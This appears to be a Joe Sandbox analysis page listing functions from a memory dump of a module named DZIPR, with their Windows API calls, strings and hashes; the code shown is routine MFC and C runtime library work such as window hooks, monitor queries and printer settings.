Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 1872732d5a5a8b04f1f556ea603fe86f90a6bcfe40e2fd5e04fd3194a4818c2e
Instruction ID: 125e5665c51a1f4b12f8e0d17b2b026b796d692c64c9f19dc1df3ea68e69a39c
Opcode Fuzzy Hash: 1872732d5a5a8b04f1f556ea603fe86f90a6bcfe40e2fd5e04fd3194a4818c2e
Instruction Fuzzy Hash: 46515E75D052289ECB60DFA5DD887ADBBB8EF59314F0001DAA458E3280DB789EC1CF64

Function 6FA6DCCE Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6FA6DE36,?,?,?,?,?,?,?,6FA6FCC6,00000000,00000002,00000028), ref: 6FA6DCF9
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FA6DD15
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FA6DD2A
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FA6DD3B
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FA6DD4C
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FA6DD5D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FA6DD6E
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FA6DD8E

Strings

MonitorFromWindow, xrefs: 6FA6DD24
USER32, xrefs: 6FA6DCEF
MonitorFromPoint, xrefs: 6FA6DD46
EnumDisplayDevicesW, xrefs: 6FA6DD68
MonitorFromRect, xrefs: 6FA6DD35
GetSystemMetrics, xrefs: 6FA6DD0F
GetMonitorInfoW, xrefs: 6FA6DD81
GetMonitorInfoA, xrefs: 6FA6DD88
EnumDisplayMonitors, xrefs: 6FA6DD57

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2451437823
Opcode ID: 1e3115f31e82d58856fa433deebf71372d5d696fb8b612b6e797ebf2ee647396
Instruction ID: a37f14113d83245d94e6db8b41c74bfa9d10aedb833ad242b17b6257a852743e
Opcode Fuzzy Hash: 1e3115f31e82d58856fa433deebf71372d5d696fb8b612b6e797ebf2ee647396
Instruction Fuzzy Hash: 45213E72825B629F8B007F75C9C486A7AE5B74FA65324C53FD435D7108DBBA10D2CB20

Function 6FA719AE Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FA719B8

Part of subcall function 6FA6C050: __EH_prolog3.LIBCMT ref: 6FA6C057

CallNextHookEx.USER32(?,?,?,?), ref: 6FA719F8

Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4

_memset.LIBCMT ref: 6FA71A51
GetClassLongW.USER32(?,000000E0), ref: 6FA71A85
SetWindowLongW.USER32(?,000000FC,Function_00010D95), ref: 6FA71ADA
GetClassNameW.USER32(?,?,00000100), ref: 6FA71B20
GetWindowLongW.USER32(?,000000FC), ref: 6FA71B46
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA71B5D
SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6FA71B6F
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA71B77
GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6FA71B86
SetWindowLongW.USER32(?,000000FC,Function_00011861), ref: 6FA71B94
CallNextHookEx.USER32(?,00000003,?,?), ref: 6FA71BA6
UnhookWindowsHookEx.USER32(?), ref: 6FA71BBA

Strings

#32768, xrefs: 6FA71A63, 6FA71A68, 6FA71B36
AfxOldWndProc423, xrefs: 6FA71B56, 6FA71B5B, 6FA71B6D, 6FA71B75, 6FA71B85

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Long$HookPropWindow$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_NameThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423
API String ID: 4265692241-2141921550
Opcode ID: c11398b7f79baf27b153b425aa0592505c4ec0aabcda6d04159d9223ac8f6f1f
Instruction ID: 73e582b942ae22bbc24cce7517bdfc72b1c0cced8c00cfd81b9721c128c0bb9a
Opcode Fuzzy Hash: c11398b7f79baf27b153b425aa0592505c4ec0aabcda6d04159d9223ac8f6f1f
Instruction Fuzzy Hash: D051E539500725ABCB31AF24CD58FEA7BB8FF05762F044195F41996280EF389AD1CBA0

Function 6FA6FBD6 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FA72C57: GetWindowLongW.USER32(?,000000F0), ref: 6FA72C62

GetParent.USER32(?), ref: 6FA6FC05
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FA6FC28
GetWindowRect.USER32(?,?), ref: 6FA6FC42
GetWindowLongW.USER32(00000000,000000F0), ref: 6FA6FC58
CopyRect.USER32(?,?), ref: 6FA6FCA5
CopyRect.USER32(?,?), ref: 6FA6FCAF
GetWindowRect.USER32(00000000,?), ref: 6FA6FCB8

Part of subcall function 6FA6DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FA6DED6

CopyRect.USER32(?,?), ref: 6FA6FCD4

Strings

(, xrefs: 6FA6FC6E

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
String ID: (
API String ID: 1385303425-3887548279
Opcode ID: d1f73d2da25cd741c92447a6a25010590c2666d5b135457527152990a5dc240f
Instruction ID: 991dcb01db84377c21b0b81567d04befac093d2bcbc724354bacbefb25786581
Opcode Fuzzy Hash: d1f73d2da25cd741c92447a6a25010590c2666d5b135457527152990a5dc240f
Instruction Fuzzy Hash: 3F514F72904619ABDB00CBA8CD85EEEBBB9FF49314F194119F915F7280EB74E941CB90

Function 6FA7A11F Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FA8E928,0000000C,6FA7A25A,00000000,00000000), ref: 6FA7A131
__crt_waiting_on_module_handle.LIBCMT ref: 6FA7A13C

Part of subcall function 6FA75BCF: Sleep.KERNEL32(000003E8,00000000,?,6FA7A082,KERNEL32.DLL,?,6FA7A0CE), ref: 6FA75BDB
Part of subcall function 6FA75BCF: GetModuleHandleW.KERNEL32(6FA8C168,?,6FA7A082,KERNEL32.DLL,?,6FA7A0CE), ref: 6FA75BE4

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FA7A165
GetProcAddress.KERNEL32(?,DecodePointer), ref: 6FA7A175
__lock.LIBCMT ref: 6FA7A197
InterlockedIncrement.KERNEL32(6FA68ADA), ref: 6FA7A1A4
__lock.LIBCMT ref: 6FA7A1B8
___addlocaleref.LIBCMT ref: 6FA7A1D6

Strings

EncodePointer, xrefs: 6FA7A159
DecodePointer, xrefs: 6FA7A16D
KERNEL32.DLL, xrefs: 6FA7A12B, 6FA7A130, 6FA7A13B

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 0193dbd010af3a4935f87d587ba7adf93adc99dec7e99a0f5cb12c9965729b73
Instruction ID: 07d4ef4b8d38b591ac8a5fed201f8102e7e0d154ca281178e1d9a4e9ce230652
Opcode Fuzzy Hash: 0193dbd010af3a4935f87d587ba7adf93adc99dec7e99a0f5cb12c9965729b73
Instruction Fuzzy Hash: 45116075805B01AEEB209F79C900F5ABBE1AF45328F108559D4A9972E0DFBCA5C1CB54

Function 6FA684DA Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FA68503
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA68520
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FA6852D
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FA6853A
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FA68547

Strings

KERNEL32, xrefs: 6FA684FE
ActivateActCtx, xrefs: 6FA6852F
CreateActCtxW, xrefs: 6FA6851A
DeactivateActCtx, xrefs: 6FA6853C
ReleaseActCtx, xrefs: 6FA68522

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-2424895508
Opcode ID: 300610a1e190a432a08e9408713297e30047fa9ab35d8f281edb0a58ea11f9ea
Instruction ID: feff7f3a919d8b3cd8320680d96ebd54118ab1ce28efffd564388aeee93a0ef7
Opcode Fuzzy Hash: 300610a1e190a432a08e9408713297e30047fa9ab35d8f281edb0a58ea11f9ea
Instruction Fuzzy Hash: E11194B181D752AFCF109FA5898A406BFBCAF57324308803FE15E87240DEB994D1CB15

Function 6FA6A59C Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32,6FA6A6B6), ref: 6FA6A5AA
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA6A5CB
GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FA6A5DD
GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FA6A5EF
GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FA6A601

Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4

Strings

KERNEL32, xrefs: 6FA6A5A5
ActivateActCtx, xrefs: 6FA6A5DF
CreateActCtxW, xrefs: 6FA6A5C5
DeactivateActCtx, xrefs: 6FA6A5F1
ReleaseActCtx, xrefs: 6FA6A5CD

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 417325364-2424895508
Opcode ID: 0cb9cdb4e4c0c80a0cafeebfca5511a91d21e0e93c591ab9bc25cff1e028cdbf
Instruction ID: 06f7e03d5a4265888cfd98deaad2a3d80de17bc70e7f7dec9ad6e6f4ed24e462
Opcode Fuzzy Hash: 0cb9cdb4e4c0c80a0cafeebfca5511a91d21e0e93c591ab9bc25cff1e028cdbf
Instruction Fuzzy Hash: CEF09E7D869B75AFCF415FB198055057F7DBB17279700C43AA85893200DFBA90A6CF41

Function 6FA71861 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6FA71868
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FA71877
CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 6FA718D1

Part of subcall function 6FA70C2C: GetWindowRect.USER32(?,10000000), ref: 6FA70C56

SetWindowLongW.USER32(?,000000FC,?), ref: 6FA718F8
RemovePropW.USER32(?,AfxOldWndProc423), ref: 6FA71900
GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6FA71907
GlobalDeleteAtom.KERNEL32(?), ref: 6FA71911
CallWindowProcW.USER32(?,?,?,?,00000000), ref: 6FA71965

Strings

AfxOldWndProc423, xrefs: 6FA71870, 6FA71875, 6FA718FE, 6FA71906

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
String ID: AfxOldWndProc423
API String ID: 2109165785-1060338832
Opcode ID: bdf508fa467d7cd31fe52451165c2545e00037e484ad536cf1a734e13b9a549d
Instruction ID: e52d53027e43a564bfc0893936d9d83657bb940ba4a2504785cf68535b3d911a
Opcode Fuzzy Hash: bdf508fa467d7cd31fe52451165c2545e00037e484ad536cf1a734e13b9a549d
Instruction Fuzzy Hash: 48316D3A40021AAFCF119FA4CE59DFF7BB8EF06325F044115F611A2190DF7999A29BA1

Function 6FA61C00 Relevance: 13.7, APIs: 9, Instructions: 159fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FA61BE9,?,?,?,?), ref: 6FA61C39
GetLastError.KERNEL32(?,?,?,?,?,6FA61BE9,?,?,?,?), ref: 6FA61C48
__aullrem.LIBCMT ref: 6FA61C60
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FA61CE8
_memset.LIBCMT ref: 6FA61CF5
SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FA61BE9,?,?,?,?), ref: 6FA61D07

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: File$Pointer$ErrorLastRead__aullrem_memset
String ID:
API String ID: 123228641-0
Opcode ID: 3498bd255d6a33ca362fda2125bfe80bbb51948b4889af4c00c87a6683fedf0b
Instruction ID: 3ade2afa22df9f5bc3ddaf9d1a6ca2fb2115b06c523491cf58973b18358e665e
Opcode Fuzzy Hash: 3498bd255d6a33ca362fda2125bfe80bbb51948b4889af4c00c87a6683fedf0b
Instruction Fuzzy Hash: C1515F71604701AFD750DF29C840BABBBE8EF89B64F044929F968D7240E774E9458BA2

Function 6FA6BE0D Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6FA6BE14
EnterCriticalSection.KERNEL32(?,00000010,6FA6C0D0,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BE25
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BE43
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6BE77
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BEE3
_memset.LIBCMT ref: 6FA6BF02
TlsSetValue.KERNEL32(?,00000000,?), ref: 6FA6BF13
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BF34

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 23c141859d66eb92c956fdd58e3e42b0ba9dd2c930716e6d20ef7d40c853a20e
Instruction ID: 7ad4772caa4f8789996b611f51fea50a04ae226f287e73f123527ac80d0f71ed
Opcode Fuzzy Hash: 23c141859d66eb92c956fdd58e3e42b0ba9dd2c930716e6d20ef7d40c853a20e
Instruction Fuzzy Hash: 6731AF74404B05EFDB24EF64C984C5ABBB1FF05364B10C62AF6259B6A0CB78E990CF90

Function 6FA681FA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FA6815A: GetParent.USER32(?), ref: 6FA681AE
Part of subcall function 6FA6815A: GetLastActivePopup.USER32(?), ref: 6FA681BF
Part of subcall function 6FA6815A: IsWindowEnabled.USER32(?), ref: 6FA681D3
Part of subcall function 6FA6815A: EnableWindow.USER32(?,00000000), ref: 6FA681E6

EnableWindow.USER32(?,00000001), ref: 6FA68247
GetWindowThreadProcessId.USER32(?,?), ref: 6FA6825B
GetCurrentProcessId.KERNEL32(?,?), ref: 6FA68265
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FA6827D
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FA682F9
EnableWindow.USER32(00000000,00000001), ref: 6FA68340

Strings

0, xrefs: 6FA682D2

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: 909fbb61be2d902178fe300e7bbbbb58d333cfdfc69820436771fc301a05f6f9
Instruction ID: 42ee659c458a2a234fd399f4b2261da3122ac130687f6c520c61c9aa5bc071ad
Opcode Fuzzy Hash: 909fbb61be2d902178fe300e7bbbbb58d333cfdfc69820436771fc301a05f6f9
Instruction Fuzzy Hash: AB418371A44B189BDB208F74CD88BDA77B8FF06714F180599E925E6280DB74EAD18B90

Function 6FA6DE96 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FA6DED6
SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FA6DF00
GetSystemMetrics.USER32(00000000), ref: 6FA6DF17
GetSystemMetrics.USER32(00000001), ref: 6FA6DF1E
MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FA6DF49

Strings

DISPLAY, xrefs: 6FA6DF40
B, xrefs: 6FA6DEE0

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: System$ByteCharMetricsMultiWide$InfoParameters
String ID: B$DISPLAY
API String ID: 381819527-3316187204
Opcode ID: 6af9da30cca5e9bd440ded143a2a56993a99fe819db9def4b48adb99ff14a4fd
Instruction ID: f26fe9e3939902071d2cb1c9e92ec2c9a0fe0b8b52a010dca9e23fff159ec159
Opcode Fuzzy Hash: 6af9da30cca5e9bd440ded143a2a56993a99fe819db9def4b48adb99ff14a4fd
Instruction Fuzzy Hash: A121DD71504720AFDF108F14CD44B577BAAEF46BA0F258526FD289B185DAB4D481CBB1

Function 6FA688C8 Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 6FA688E7
lstrcmpW.KERNEL32(00000000,?), ref: 6FA688F4
OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6FA68906
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FA68926
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FA6892E
GlobalLock.KERNEL32(00000000), ref: 6FA68938
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6FA68945
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6FA6895D

Part of subcall function 6FA6DAD1: GlobalFlags.KERNEL32(?), ref: 6FA6DAE0
Part of subcall function 6FA6DAD1: GlobalUnlock.KERNEL32(?), ref: 6FA6DAF2
Part of subcall function 6FA6DAD1: GlobalFree.KERNEL32(?), ref: 6FA6DAFD

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 8b50b85ac546caecded5d3a563bc04c9151fe962270c52518a2f8689640c2a18
Instruction ID: 5d3ffe91aea7df60e767de57b5d6d05e6cb8bb7d3f8839a4b52b78af2f4bc5e1
Opcode Fuzzy Hash: 8b50b85ac546caecded5d3a563bc04c9151fe962270c52518a2f8689640c2a18
Instruction Fuzzy Hash: E511EF76404A04BFDB115BA5CD48CAF7BBDFF86B147004019FA21E2020DB78D981D720

